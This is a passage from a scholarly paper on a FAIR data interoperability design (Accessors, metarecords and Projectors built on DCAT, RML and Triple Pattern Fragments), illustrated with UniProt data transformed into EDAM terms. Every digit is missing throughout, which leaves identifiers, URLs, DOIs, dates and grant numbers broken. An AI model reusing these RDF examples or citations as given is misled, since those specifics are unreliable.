this will be similar to the document returned by calling a fair metarecord url in the zenodo use case discussed in the earlier methods section. calling http get on a metarecord resource url returns a document that includes the metadata elements and structure shown in fig. . note that fig. is not the complete metarecord; rather, it has been edited to include only those elements relevant to the aspects of the interoperability infrastructure that have been discussed so far. more complete examples of the metarecord rdf, including the elements describing a projector, are described in figs. – . many properties in this metadata document are similar to those at the higher level of the fair accessor. notably, however, the primary topic of this document is the uniprot record, indicating a shift in the focus of the document from the provider of the accessor to the provider of the originating data. therefore, the values of these facets now reflect the authorship and contact information for that record. we do recognize that metarecords are themselves scholarly works and should be properly cited. the metarecord includes the "in dataset" predicate, which refers back to the first level of the fair accessor, and this provides one avenue for capturing the provenance information for the metarecord. if additional provenance detail is required, we propose (but do not describe further here) that this information could be contained in a separate named graph, in a manner akin to that used by nanopublications (kuhn et al., ).

@prefix dc: <http://purl.org/dc/elements/1.1/>.
@prefix dcat: <http://www.w3.org/ns/dcat#>.
@prefix uni: <http://linkeddata.systems/accessors/uniprotaccessor/>.

uni:c v l dcat:distribution
    <#distributiond f -c - e - c- d c dd>,
    <#distributiond f -c - e - c- d c dd> .

<#distributiond f -c - e - c- d c dd>
    dc:format "text/html" ;
    a dc:dataset, dcat:distribution ;
    dcat:downloadURL <http://www.uniprot.org/uniprot/c v l .html> .

<#distributiond f -c - e - c- d c dd>
    dc:format "application/rdf+xml" ;
    a dc:dataset, void:dataset, dcat:distribution ;
    dcat:downloadURL <http://www.uniprot.org/uniprot/c v l .rdf> .

figure: turtle representation of the subset of triples from the metarecord metadata pertaining to the two dcat distributions. each distribution specifies an available representation (media type), and a url from which that representation can be downloaded.

figure: a portion of the output from resolving the metarecord resource of the fair accessor for record c uzx , rendered into html by the tabulator firefox plugin. the columns have the same meaning as in fig. . comparing the structure of this document to that in fig. shows that there are now four values for the "distribution" predicate: an rdf and an html representation, as in fig. , and two additional distributions with urls conforming to the tpf design pattern (highlighted).
@prefix dc: <http://purl.org/dc/elements/1.1/>.
@prefix dcat: <http://www.w3.org/ns/dcat#>.
@prefix rr: <http://www.w3.org/ns/r2rml#>.
@prefix ql: <http://semweb.mmlab.be/ns/ql#>.
@prefix rml: <http://semweb.mmlab.be/ns/rml#>.
@prefix void: <http://rdfs.org/ns/void#>.
@prefix uni: </cgi-bin/accessors/uniprotaccessor/>.
@prefix fai: <http://datafairport.org/ontology/fair-schema.owl#>.
@prefix core: <http://purl.uniprot.org/core/>.
@prefix edam: <http://edamontology.org/>.

uni:c v l dcat:distribution
    <#distribution efd -c f - e - - e d c dd> .

<#distribution efd -c f - e - - e d c dd>
    dc:format "application/rdf+xml", "application/x-turtle", "text/html" ;
    rml:hasmapping <#mappings efd -c f - e - - e d c dd> ;
    a fai:projector, dc:dataset, void:dataset, dcat:distribution ;
    dcat:downloadURL <http://linkeddata.systems: /fragments?subject=http% a% f% fidentifiers% eorg% funiprot% fc v l &predicate=http% a% f% fpurl% euniprot% eorg% fcore% fclassifiedWith> .

<#mappings efd -c f - e - - e d c dd>
    rr:subjectMap <#subjectmap efd -c f - e - - e d c dd> ;
    rr:predicateObjectMap <#pomap efd -c f - e - - e d c dd> .

<#subjectmap efd -c f - e - - e d c dd>
    rr:class edam:data_ ;
    rr:template "http://identifiers.org/uniprot/{id}" .

<#pomap efd -c f - e - - e d c dd>
    rr:objectMap <#objectmap efd -c f - e - - e d c dd> ;
    rr:predicate core:classifiedWith .

<#objectmap efd -c f - e - - e d c dd>
    rr:parentTriplesMap <#subjectmap efd -c f - e - - e d c dd> .

<#subjectmap efd -c f - e - - e d c dd>
    rr:class edam:data_ ;
    rr:template "http://identifiers.org/taxon/{tax}" .

figure: turtle representation of the subset of triples from the metarecord metadata pertaining to one of the fair projector dcat distributions of the metarecord shown in fig. . the text is colour-coded to assist in visual exploration of the rdf. the dcat distribution blocks of the two projector distributions (black bold) have multiple media-type representations (red), and are connected to an rml map (dark blue) by the hasmapping predicate, which is a block of rml that semantically describes the subject, predicate, and object (green, orange, and purple respectively) of the triple descriptor for that projector. this block of rml is schematically diagrammed in fig. . the three media-types (red) indicate that the url will respond to http content negotiation, and may return any of those three formats.

in uniprot:
http://purl.uniprot.org/uniprot/c uzx
    a http://purl.uniprot.org/core/Protein ;
    http://purl.uniprot.org/core/classifiedWith http://purl.obolibrary.org/obo/go_ .
http://purl.obolibrary.org/obo/go_
    a http://www.w3.org/2002/07/owl#Class

after projection:
http://identifiers.org/uniprot/c uzx
    a http://edamontology.org/data_ ;
    http://purl.uniprot.org/core/classifiedWith http://purl.obolibrary.org/obo/go_ .
http://purl.obolibrary.org/obo/go_
    a http://edamontology.org/data_

figure: data before and after fair projection. bolded segments show how the uri structure and the semantics of the data were modified, according to the mapping defined in the triple descriptor (data_ = "protein report" and data_ = "go concept id"). uri structure transformations may be useful for integrative queries against datasets that utilize the identifiers.org uri scheme, such as openlifedata (gonzález et al., ). semantic transformations allow integrative queries across datasets that utilize diverse and redundant ontologies for describing their data, and in this example, may also be used to add semantics where there were none before.

the important distinctive property in this document is the "distribution" property, from the dcat ontology. for clarity, an abbreviated document in turtle format is shown in fig. , containing only the "distribution" elements and their values.
there are two dcat distributions in this document. the first is described as being in format "application/rdf+xml", with its associated download url. the second is described as being in format "text/html", again with the correct url for that representation. both are typed as distributions from the dcat ontology. these distributions are published by uniprot themselves, and the uniprot urls are used. additional metadata in the fair accessor (not shown in fig. ) describes the keywords that relate to that record in both machine- and human-readable formats, access policy, and license, allowing machines to more accurately determine the utility of this record prior to retrieving it.

several things are important to note before moving to a discussion of fair projectors. first, the two levels of the fair accessor are not interdependent. the container layer can describe relevant information about the scope and nature of a repository, but might not provide any further links to metarecords. similarly, whether or not to provide a distribution within a metarecord is entirely at the discretion of the data owner. for sensitive data, an owner may choose to simply provide (even limited) metadata, but not provide any direct link to the data itself, and this is perfectly conformant with the fair guidelines. further, when publishing a single data record, it is not obligatory to publish the container level of the fair accessor; one could simply provide the metarecord document describing that data file, together with an optional link to that file as a distribution. finally, it is also possible to publish containers of containers, to any depth, if such is required to describe a multi-resource scenario (e.g., an institution hosting multiple distinct databases).

the fair projector

fair projectors can be used for many purposes, including (but not limited to) publishing transformed linked data from non-linked data; publishing transformed data from a linked data source into a distinct structure or ontological framework; load-management/query-management; or as a means to explicitly describe the ontological structure of an underlying data source in a searchable manner. in this demonstration, the fair projector publishes dynamically transformed data, where the transformation involves altering the semantics of rdf provided by uniprot into a different ontological framework (edam). this fair projector's tpf interface is available at:

http://linkeddata.systems: /fragments

data exposed as a tpf-compliant resource requires a subject and/or predicate and/or object value to be specified in the url; a request for the all-variable pattern (blank, as above) will return nothing. how can a software agent know what urls are valid, and what will be returned from such a request? in this interoperability infrastructure, we propose that projectors should be considered as dcat distributions, and thus tpf urls, with appropriate parameters bound, are included in the distribution section of the metarecord metadata. an example is shown in fig. , again rendered using tabulator. note that there are now four distributions—two of them are the html and rdf distributions discussed above (fig. ). the two new distributions are those provided by a fair projector. again, looking at an abbreviated and simplified turtle document for clarity (fig. ), we can see the metadata structure of one of these two new distributions.
following the triple pattern fragments behaviour, requesting the downloadurl with http get will trigger the projector to restrict its output to only those data from uniprot where the subject is uniprot record c v l , and the property of interest is "classifiedwith" from the uniprot core ontology. the triples returned in response to this call, however, will not match the native semantics of uniprot, but rather will match the semantics and structure defined in the rml mappings block. the schematic structure of this mapping rml is diagrammed in fig. . the mapping describes a triple where the subject will be of type edam:data_ ("protein record"), the predicate will be "classifiedwith" from the uniprot core ontology, and the object will be of type edam:data_ ("go concept id"). specifically, the triples returned are:

@prefix uni: <http://identifiers.org/uniprot/>.
@prefix obo: <http://purl.obolibrary.org/obo/>.

uni:c v l core:classifiedWith obo:go_ , obo:go_ .

this is accompanied by a block of hypermedia controls (not shown) using the hydra vocabulary (lanthaler & gütl, ; das, sundara & cyganiak, ) that provide machine-readable instructions for how to navigate the remainder of that dataset—for example, how to get the entire row, or the entire column, for the current data-point. though the subject and object are not explicitly typed in the output from this call to the projector, further exploration of the projector's output, via those tpf hypermedia controls, would reveal that the subject and object are in fact typed according to the edam ontology, as declared in the rml mapping. thus, this fair projector served data transformed from uniprot core semantic types to the equivalent data represented within the edam semantic framework, as shown in fig. . also note that the uri structure for the uniprot entity has been changed from the uniprot uri scheme to a uri following the identifiers.org scheme. the fair projector, in this case, is a script that dynamically transforms data from a query of uniprot into the appropriately formatted triples; however, this is opaque to the client. the projector's tpf interface, from the perspective of the client, would be identical if the projector was serving pre-transformed data from a static document, or even generating novel data from an analytical service. thus, fair projectors harmonize the interface for retrieving rdf data in a desired semantic structure, regardless of the underlying mechanism for generating that data.

this example was chosen for a number of reasons. first, to contrast with the static zenodo example provided earlier, this accessor/projector combination queries the uniprot database dynamically. in addition, we wished to demonstrate the utility of the projector's ability to transform the semantic framework of existing fair data in a discoverable way. for example, in uniprot, gene ontology terms do not have a richer semantic classification than "owl:class". with respect to interoperability, this is problematic, as the lack of rich semantic typing prevents them from being used for automated discovery of resources that could potentially consume them, or use them for integrative, cross-domain queries.
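for completeness, a minimal sketch (our own, not part of the published infrastructure) of how a client could make the projector call just described and inspect the transformed triples; the endpoint, record uri, and accept header below are placeholder assumptions rather than a live service.

# call a fair projector's tpf interface with a bound subject and predicate
import requests
from rdflib import Graph, URIRef

fragments = "http://example.org/fragments"             # placeholder tpf endpoint
subject   = "http://identifiers.org/uniprot/EXAMPLE"   # placeholder record uri
predicate = "http://purl.uniprot.org/core/classifiedWith"

resp = requests.get(fragments,
                    params={"subject": subject, "predicate": predicate},
                    headers={"Accept": "text/turtle"})
resp.raise_for_status()

g = Graph().parse(data=resp.text, format="turtle")

# the fragment mixes data triples with hydra hypermedia controls; keep only the
# triples that match the requested pattern (the projector's transformed data)
data = [(s, p, o) for s, p, o in g
        if s == URIRef(subject) and p == URIRef(predicate)]
for s, p, o in data:
    print(s, p, o)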
this fair accessor/projector advertises that it is possible to obtain edam-classified data from uniprot simply by resolving the projector url.

discussion

interoperability is hard. it was immediately evident that, of the four fair principles, interoperability was going to be the most challenging. here we have designed a novel infrastructure with the primary objective of interoperability for both metadata and data, but with an eye to all four of the fair principles. we wished to provide discoverable and interoperable access to a wide range of underlying data sources—even those in computationally opaque formats—as well as supporting a wide array of both academic and commercial end-user applications above these data sources. in addition, we imposed constraints on our selection of technologies; in particular, that the implementation should re-use existing technologies as much as possible, and should support multiple and unpredictable end-uses. moreover, it was accepted from the outset that the trade-off between simplicity and power was one that could not be avoided, since a key objective was to maximize uptake over the broadest range of data repositories, spanning all domains—this would be nearly impossible to achieve through, for example, attempting to impose a 'universal' api or novel query language. thus, with the goal of maximizing global uptake and adoption of this interoperability infrastructure, and democratizing the cost of implementation over the entire stakeholder community—both users and providers—we opted for lightweight, weakly integrative, rest solutions that nevertheless lend themselves to significant degrees of mechanization in both discovery and integration. we now look more closely at how this interoperability infrastructure meets the expectations within the fair principles.

fair facet(s) addressed by the container resource:

• findable—the container has a distinct, globally unique, and resolvable identifier, allowing it to be discovered and explicitly, unambiguously cited. this is important because, in many cases, the dataset being described does not natively possess an identifier, as in our example above where the dataset represented the results of a query. in addition, the container's metadata describes the research object, allowing humans and machines to evaluate the potential utility of that object for their task.

• accessible—the container url resolves to a metadata record using standard http get. in addition to describing the nature of the research object, the metadata record should include information regarding licensing, access restrictions, and/or the access protocol for the research object. importantly, the container metadata exists independently of the research object it describes, where fair accessibility requires metadata to be persistently available even if the data itself is not.

• interoperable—the metadata is provided in rdf, a globally-applicable syntax for data and knowledge sharing. in addition, the metadata uses shared, widely-adopted public ontologies and vocabularies to facilitate interoperability at the metadata level.

• reusable—the metadata includes citation information related to the authorship of the container and/or its contents, and license information related to the reuse of the data, by whom, and for what purpose.
other features of the container resource

• privacy protection—the container metadata provides access to a rich description of the content of a resource, without exposing any data within that resource. while a provider may choose to include metarecord urls within this container, they are not required to do so if, for example, the data is highly sensitive, or no longer easily accessible; however, the contact information provided within the container allows potential users of that data to inquire as to the possibility of gaining access in some other way. as such, this container facilitates a high degree of fairness, while still providing a high degree of privacy protection.

fair facet(s) addressed by the metarecord:

• findable—the metarecord url is a globally-unique and resolvable identifier for a data entity, regardless of whether or not it natively possesses an identifier. the metadata it resolves to allows both humans and machines to interrogate the nature of a data element before deciding to access it.

• accessible—the metadata provided by accessing the metarecord url describes the accessibility protocol and license information for that record, and describes all available formats.

• interoperable—as with the container metadata, the use of shared ontologies and rdf ensures that the metadata is interoperable.

• reusable—the metarecord metadata should carry record-level citation information to ensure proper attribution if the data is used. we further propose, but do not demonstrate, that authorship of the metarecord itself could be carried in a second named-graph, in a manner similar to that proposed by the nanopublication specification.

other features of the metarecord

• privacy protection—the metarecord provides for rich descriptive information about a specific member of a collection, where the granularity of that description is entirely under the control of the data owner. as such, the metarecord can provide a high degree of fairness at the level of an individual record, without necessarily exposing any identifiable information. in addition, the provider may choose to stop at this level of fairness, and not include further urls giving access to the data itself.

• symmetry of traversal—since we predict that clients will, in the future, query over indexes of fair metadata searching for datasets or records of interest, it is not possible to predict the position at which a client or their agent will enter your fair accessor. while the container metadata provides links to individual metarecords, the metarecord similarly provides a reference back "upwards" to its container. thus a client can access repository-level metadata (e.g., curation policy, ownership, linking policy) for any given data element it discovers. this became particularly relevant as a result of the european court of justice decision (court of justice of the european union, ) that puts the burden of proof on those who create hyperlinks to ensure the document they link to is not, itself, in violation of copyright.

• high granularity of access control—individual elements of a collection may have distinct access constraints or licenses. for example, individual patients within a study may have provided different consent.
metarecords allow each element within a collection to possess, and publish, its own access policy, access protocol, license, and/or usage-constraints, thus providing fine-grained control of the access/use of individual elements within a repository.

fair facet(s) addressed by the triple descriptors and fair projectors:

• findable—triple descriptors, in isolation or when aggregated into fair profiles, provide one or more semantic interpretations of data elements. by indexing these descriptors, it would become possible to search over datasets for those that contain data-types of interest. moreover, fair projectors, as a result of the tpf uri structure, create a unique url for every data-point within a record. this has striking consequences with respect to scholarly communication. for example, it becomes possible to unambiguously refer to, and therefore "discuss" and/or annotate, individual spreadsheet cells from any data repository.

• accessible—using the tpf design patterns, all data retrieval is accomplished in exactly the same way: via http get. the response includes machine-readable instructions that guide further exploration of the data without the need to define an api. fair projectors also give the data owner high-granularity access control; rather than publishing their entire dataset, they can select to publish only certain components of that dataset, and/or can put different access controls on different data elements, for example, down to the level of an individual spreadsheet cell.

• interoperable—fair projectors provide a standardized way to export any type of underlying data in a machine-readable structure, using widely-used, public, shared vocabularies. data linkages that were initially implicit in the datastore (identifiers, for example) become explicit when converted into uris, resulting in qualified linkages between formerly opaque data deposits. similarly, data that resides within computationally opaque structures or formats can also be exposed, and published in a fair manner, if there is an algorithm capable of extracting it and exposing it via the tpf interface.

• reusable—all data points now possess unique identifiers, which allows them to be explicitly connected to their citation and license information (i.e., the metarecord). in this way, every data point, even when encountered in isolation, provides a path to trace back to its reusability metadata.

other features of fair projection

• native formats are preserved—as in many research domains, bioinformatics has created a large number of data/file formats. many of these, especially those that hold "big data", are specially formatted flat-files that focus on size-efficient representation of data, at the expense of general machine-accessibility. the analytical tooling that exists in this domain is capable of consuming these various formats. while the fair data community has never advocated for wholesale interoperable representations of these kinds of data—which would be inefficient, wasteful, and lacking in utility—the fair projector provides a middle-ground. projection allows software to query the core content of a file in a repository prior to downloading it; for example, to determine if it contains data about an entity or identifier of interest. fair projectors, therefore, enable efficient discovery of data of interest, without requiring wasteful transformation of all data content into a fair format.
• semantic conversion of existing triplestores—it is customary to re-cast the semantic types of entities within triplestores using customized sparql bind or construct clauses. fair projectors provide a standardized, sparql-free, and discoverable way to accomplish the same task. this further harmonizes data, and simplifies interoperability.

• standardized interface to (some) web apis—many web apis in the biomedical domain have a single input parameter, generally representing an identifier for some biochemical entity. fair projectors can easily replace these myriad web apis with a common tpf interface, thus dramatically enhancing discoverability, machine-readability, and interoperability between these currently widely disparate services.

incentives and barriers to implementation

looking forward, there is every indication that fairness will soon be a requirement of funding agencies and/or journals. as such, infrastructures such as the one described in this exemplar will almost certainly become a natural part of scholarly data publishing in the future. though the fair infrastructure proposed here may appear difficult to achieve, we argue that a large portion of these behaviours—for example, the first two layers of the accessor—can be accomplished using simple fill-in-the-blank templates. such templating tools are, in fact, already being created by several of the co-authors, and will be tested on the biomedical data publishing community in the near future to ensure they are clear and usable by this key target-audience. projection, however, is clearly a complex undertaking, and one that is unlikely to be accomplished by non-informaticians on their own. transformation from unstructured or semi-structured formats into interoperable formats cannot be fully automated, and we do not claim to have fully solved the interoperability bottleneck. we do, however, claim to have created an infrastructure that improves on the status quo in two ways. first, we propose to replace the wasteful, one-off, "reuseless" data transformation activities currently undertaken on a daily basis throughout the biomedical community (and beyond) with a common, reusable, and machine-readable approach, by suggesting that all data transformations should be described in rml and the transformed data exposed using tpf. second, the solution we propose may, in many cases, partially automate the data transformation process itself. rml can be used, in combination with generic software such as the rml processor (http://github.com/rmlio), to actuate a data transformation over many common file formats such as csv or xml. as such, by focusing on building rml models, in lieu of reuseless data transformation scripts, data publishers achieve both the desired data transformation and a machine-readable interface that provides that transformed data to all other users. this may be incentivized even more by creating repositories of rml models that can be reused by those needing to do data transformations. though the infrastructure for capturing these user-driven transformation events and formalizing them into fair projectors does not yet exist, it does not appear on its surface to be a complex problem. thus, we expect that such infrastructure should appear soon after fairness becomes a scholarly publishing requirement, and early prototypes of these infrastructures are being built by our co-authors.
several communities of data providers are already planning to use this, or related fair implementations, to assist their communities to find, access, and reuse their valuable data holdings. for example, the biobanking and rare disease communities will be given end-user tools that utilize/generate such fair infrastructures to: guide discovery by researchers; help both biobankers and researchers to re-code their data to standard ontologies, building on the sorta system (pang et al., ); assist in extending the molgenis/biobankconnect system (pang et al., ); and add fair interfaces to the bbmri (biobanking and biomolecular resources research infrastructure) and rd-connect national and european biobank data and sample catalogues. there is also a core group of fair infrastructure authors who are creating large-scale indexing and discovery systems that will facilitate the automated identification and retrieval of relevant information, from any repository, in response to end-user queries, portending a day when currently unused—"lost"—data deposits once again provide return-on-investment through their discovery and reuse.

conclusions

there is a growing movement of governing bodies and funding organizations towards a requirement for open data publishing, following the fair principles. it is, therefore, useful to have an exemplar "reference implementation" that demonstrates the kinds of behaviours that are expected from fair resources. of the four fair principles, interoperability is arguably the most difficult fair facet to achieve, and has been the topic of decades of informatics research. several new standards and frameworks have appeared in recent months that address various aspects of the interoperability problem. here, we apply these in a novel combination, and show that the result is capable of providing interoperability between formerly incompatible data formats published anywhere on the web. in addition, we note that the other three aspects of fair—findability, accessibility, and reusability—are easily addressed by the resulting infrastructure. the outcome, therefore, provides machine-discoverable access to richly described data resources in any format, in any repository, with the possibility of interoperability of the contained data down to the level of an individual "cell". no new standards or apis were required; rather, we rely on rest behaviour, with all entities being resources with a resolvable identifier that allow hypermedia-driven "drill-down" from the level of a repository descriptor all the way to an individual data point in the record. such an interoperability layer may be created and published by anyone, for any data source, without necessitating an interaction with the data owner. moreover, the majority of the interoperability layer we describe may be achieved through dynamically generated files from software, or even (for the accessor portion) through static, manually-edited files deposited in any public repository. as such, knowledge of how to build or deploy web infrastructure is not required to achieve a large portion of these fair behaviours. the trade-off between power and simplicity was considered acceptable, as a means to hopefully encourage wide adoption.
the modularity of the solution was also important because, in a manner akin to crowdsourcing, we anticipate that the implementation will spread through the community on a needs-driven basis, with the most critical resource components being targeted early—the result of individual researchers requiring interoperable access to the datasets/subsets of interest to them. the interoperability design patterns presented here provide a structured way for these individuals to contribute and share their individual effort—effort they would have invested anyway—in a collaborative manner, piece-by-piece building a much larger interoperable and fair data infrastructure to benefit the global community.

acknowledgements

in january the lorentz center hosted the 'jointly designing a data fairport' workshop. this workshop was organized by barend mons in collaboration with, and co-sponsored by, the lorentz center, the dutch techcentre for life sciences/elixir-nl and the netherlands escience center. the workshop led to the formalization of the fair principles and subsequently to the formation of a fair skunkworks team and a fair data engineering team. we thank barend mons for critical discussions leading up to this article. we would also like to thank the uniprot rdf and sparql team at the swiss-prot group of the sib swiss institute of bioinformatics for their advice and assistance. we would like to acknowledge the advice and feedback from the leaders and participants of biohackathon , hosted by the integrated database project (ministry of education, culture, sports, science and technology, japan), the national bioscience database center (nbdc, japan), and the database center for life sciences (dbcls, japan).

additional information and declarations

funding

the lead author is supported by the fundacion bbva + upm isaac peral programme, and the spanish ministerio de economía y competitividad grant number tin - -r. additional support for fair skunkworks members comes from the european union funded projects elixir-excelerate (h no. ), adopt bbmri-eric (h no. ) and corbel (h no. ). portions of this work have been funded by the netherlands organisation for scientific research (odex all project), stichting topconsortium voor kennis en innovatie high tech systemen en materialen (fairdict project), bbmri-nl, rd-connect and elixir (rare disease implementation study fp no. ). uniprot is mainly supported by the national institutes of health (nih), national human genome research institute (nhgri) and national institute of general medical sciences (nigms) grant u hg . swiss-prot activities at the sib are supported by the swiss federal government through the state secretariat for education, research and innovation seri. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures

the following grant information was disclosed by the authors:
fundacion bbva + upm isaac peral programme.
spanish ministerio de economía y competitividad: tin - -r.
european union funded projects elixir-excelerate: h no. .
adopt bbmri-eric: h no. .
corbel: h no. .
netherlands organisation for scientific research.
fairdict project.
national institutes of health (nih).
national human genome research institute (nhgri). national institute of general medical sciences (nigms): u hg . swiss federal government. competing interests the authors declare there are no competing interests. author contributions • mark d. wilkinson conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • ruben verborgh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • luiz olavo bonino da silva santos, fleur d.l. kelpin, arnold kuzniar and anand gavai conceived and designed the experiments, analyzed the data, reviewed drafts of the paper. • tim clark, alasdair j.g. gray, erik m. van mulligen and paolo ciccarese conceived and designed the experiments, reviewed drafts of the paper. • morris a. swertz, erik a. schultes, mark thompson and rajaram kaliyaperumal conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • jerven t. bolleman analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper, fixed the demonstrative query, clarified the semantics of uniprot, corrected erroneous ontological annotations;. • michel dumontier conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the manuscript describes a set of practices and behaviors that combine third-party technologies and standards in a novel manner. this does not (necessarily) require novel, dedicated software, and therefore a repository is not provided. the paper uses only public data for its demonstration, and the query to retrieve that data from-source is provided in the manuscript text (the curator of that data is uniprot, the data is being used/republished with their explicit permission, and a member of their team is a co-author on the manuscript). references bechhofer s, buchan i, de roure d, missier p, ainsworth j, bhagat j, couch p, cruick- shank d, delderfield m, dunlop i, gamble m, michaelides d, owen s, newman d, sufi s, goble c. . why linked data is not enough for scientists. future generations computer systems: fgcs : – doi . /j.future. . . . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /peerj-cs. berners-lee t. . linked data. available at https://www.w .org/designissues/ linkeddata.html (accessed on september ). berners-lee t, chen y, chilton l, connolly d, dhanaraj r, hollenbach j, lerer a, sheets d. . tabulator: exploring and analyzing linked data on the semantic web. in: proceedings of the rd international semantic web user interaction workshop. ciccarese p, soiland-reyes s, belhajjame k, gray aj, goble c, clark t. . pav ontology: provenance, authoring and versioning. journal of biomedical semantics : doi . / - - - . cook ce, bergman mt, finn rd, cochrane g, birney e, apweiler r. . the european bioinformatics institute in : data growth and integration. nucleic acids research :d –d doi . /nar/gkv . court of justice of the european union. . press release no / . available at http://curia.europa.eu/jcms/upload/docs/application/pdf/ - /cp en.pdf (accessed on december ). 
covitz pa, hartel f, schaefer c, coronado s, fragoso g, sahni h, gustafson s, buetow kh. . cacore: a common infrastructure for cancer informatics. bioinformatics : – doi . /bioinformatics/btg . crosswell lc, thornton jm. . elixir: a distributed infrastructure for european bi- ological data. trends in biotechnology : – doi . /j.tibtech. . . . das s, sundara s, cyganiak r. . r rml: rdb to rdf mapping language. w c recommendation. available at https://www.w .org/tr/r rml/ . de giovanni r, copp c, döring m, hobern d. . tapir—tdwg access protocol for information retrieval. tswg standards. available at http://www.tdwg.org/ standards/ . dimou a, vander sande m, colpaert p, verborgh r, mannens e, van de walle r. . rml: a generic language for integrated rdf mappings of heterogeneous data. in: proceedings of the th workshop on linked data on the web, vol. , ceur workshop proceedings. dumontier m, gray ajg, marshall ms, alexiev v, ansell p, bader g, baran j, bolleman jt, callahan a, cruz-toledo j, gaudet p, gombocz ea, gonzalez-beltran an, groth p, haendel m, ito m, jupp s, juty n, katayama t, kobayashi n, krish- naswami k, laibe c, novère n, lin s, malone j, miller m, mungall cj, rietveld l, wimalaratne sm, yamaguchi a. . the health care and life sciences community profile for dataset descriptions. peerj :e doi . /peerj. . fallside dc, walmsley p. . xml schema part —primer second edition. available at https://www.w .org/tr/xmlschema- / (accessed on december ). fielding rt, taylor rn. . principled design of the modern web architecture. acm transactions on internet technology : – doi . / . . gessler ddg, schiltz gs, may gd, avraham s, town cd, grant d, nelson rt. . sswap: a simple semantic web architecture and protocol for semantic web services. bmc bioinformatics : doi . / - - - . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/designissues/linkeddata.html https://www.w .org/designissues/linkeddata.html http://dx.doi.org/ . / - - - http://dx.doi.org/ . /nar/gkv http://curia.europa.eu/jcms/upload/docs/application/pdf/ - /cp en.pdf http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /j.tibtech. . . https://www.w .org/tr/r rml/ http://www.tdwg.org/standards/ http://www.tdwg.org/standards/ http://dx.doi.org/ . /peerj. https://www.w .org/tr/xmlschema- / http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. gonzález ar, callahan a, cruz-toledo j, garcia a, aranguren m, dumontier m, wilkinson md. . automatically exposing openlifedata via sadi semantic web services. journal of biomedical semantics : doi . / - - - . gray ajg, baran j, marshall ms, dumontier m. . dataset descriptions: hcls community profile. interest group note, w c (may ). available at http://www. w org/tr/hcls-dataset. heery r, patel m. . application profiles: mixing and matching metadata schemas. ariadne issue . september , . available at http://www.ariadne.ac.uk/issue / app-profiles/ . ison j, kalas m, jonassen i, bolser d, uludag m, mcwilliam h, malone j, lopez r, pettifer s, rice p. . edam: an ontology of bioinformatics operations, types of data and identifiers, topics and formats. bioinformatics : – doi . /bioinformatics/btt . kuhn t, tobias k, christine c, michael k, núria q-r, ruben v, george g, ngomo a- cn, raffaele v, michel d. . decentralized provenance-aware publishing with nanopublications. peerj computer science :e doi . /peerj-cs. . lanthaler m, gütl c. . hydra: a vocabulary for hypermedia-driven web apis. 
in: proceedings of the th workshop on linked data on the web (ldow ), may , , rio de janeiro, brazil. available at http://ceur-ws.org/vol- /papers/ ldow -paper- .pdf . maali f, erickson j, archer p. . data catalog vocabulary (dcat). w c recom- mendation. available at https://www.w .org/tr/vocab-dcat/ . martin d, paolucci m, mcilraith s, burstein m, mcdermott d, mcguinness d, parsia b, payne t, sabou m, solanki m, srinivasan n, sycara k. . bringing semantics to web services: the owl-s approach. in: semantic web services and web process composition: first international workshop, swswpc , san diego, ca, usa, july , , revised selected papers. springer berlin heidelberg, – . martin d, paolucci m, wagner m. . towards semantic annotations of web services: owl-s from the sawsdl perspective. in: proceedings of the owl-s experiences and future developments workshop at eswc. available at https://static.aminer.org/pdf/ pdf/ / / /grounding_owl_s_in_wsdl_s.pdf . miles a, bechhofer s. . skos simple knowledge organization system reference. w c recommendation. available at https://www.w .org/tr/skos-reference/ . pang c, van enckevort d, de haan m, kelpin f, jetten j, hendriksen d, de boer t, charbon b, winder e, van der velde kj, doiron d, fortier i, hillege h, swertz ma. . molgenis/connect: a system for semi-automatic integration of heterogeneous phenotype data with applications in biobanks. bioinformatics : – doi . /bioinformatics/btw . pang c, sollie a, sijtsma a, hendriksen d, charbon b, de haan m, de boer t, kelpin f, jetten j, van der velde jk, smidt n, sijmons r, hillege h, swertz ma. . sorta: a system for ontology-based re-coding and technical annotation of biomedical phenotype data. database :bav doi . /database/bav . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - http://www.w org/tr/hcls-dataset http://www.w org/tr/hcls-dataset http://www.ariadne.ac.uk/issue /app-profiles/ http://www.ariadne.ac.uk/issue /app-profiles/ http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . /peerj-cs. http://ceur-ws.org/vol- /papers/ldow -paper- .pdf http://ceur-ws.org/vol- /papers/ldow -paper- .pdf https://www.w .org/tr/vocab-dcat/ https://static.aminer.org/pdf/pdf/ / / /grounding_owl_s_in_wsdl_s.pdf https://static.aminer.org/pdf/pdf/ / / /grounding_owl_s_in_wsdl_s.pdf https://www.w .org/tr/skos-reference/ http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /database/bav http://dx.doi.org/ . /peerj-cs. roche dg, kruuk leb, lanfear r, binning sa. . public data archiving in ecology and evolution: how well are we doing? plos biology :e doi . /journal.pbio. . rodriguez iglesias, alejandro, marconi, marco, sesma, ane, wilkinson, mark. . rdf representation of rna metabolism evolution data—version (diagrammed in https://zenodo.org/deposit/ /) [data set]. zenodo. doi . /zenodo. . sib swiss institute of bioinformatics members. . the sib swiss institute of bioinformatics’ resources: focus on curated databases. nucleic acids research :d –d doi . /nar/gkv . speicher s, arwe j, malhotra a. . linked data platform . . w c recommenda- tion. available at https://www.w .org/tr/ldp/ . starr j, castro e, crosas m, dumontier m, downs rr, duerr r, haak ll, haendel m, herman i, hodson s, hourclé j, kratz je, lin j, nielsen lh, nurnberger a, proell s, rauber a, sacchi s, smith a, taylor m, clark t. . achieving human and machine accessibility of cited data in 